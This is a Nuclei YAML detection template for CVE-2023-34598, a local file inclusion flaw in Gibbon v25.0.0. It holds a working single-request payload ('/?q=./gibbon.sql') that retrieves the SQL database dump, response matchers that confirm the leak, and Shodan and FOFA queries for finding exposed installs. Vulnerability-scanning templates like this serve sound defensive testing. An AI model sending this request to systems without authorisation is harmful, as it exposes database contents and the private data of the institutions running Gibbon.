nuclei-templates/http/cves/2023/CVE-2023-34598.yaml

46 lines
1.2 KiB
YAML

id: CVE-2023-34598
info:
name: Gibbon v25.0.0 - Local File Inclusion
author: DhiyaneshDk
severity: critical
description: |
Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.
reference:
- https://github.com/maddsec/CVE-2023-34598
- https://twitter.com/shaybt12/status/1673612503547355137?s=20
- https://nvd.nist.gov/vuln/detail/CVE-2023-34598
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34598
cwe-id: CWE-22
epss-score: 0.03671
cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:*
epss-percentile: 0.9052
metadata:
max-request: 1
verified: true
shodan-query: http.favicon.hash:-165631681
fofa-query: icon_hash="-165631681"
vendor: gibbonedu
product: "gibbon"
tags: cve,cve2023,gibbon,lfi
http:
- method: GET
path:
- "{{BaseURL}}/?q=./gibbon.sql"
matchers-condition: and
matchers:
- type: word
words:
- "phpMyAdmin SQL Dump"
- "gibbon"
condition: and
- type: status
status:
- 200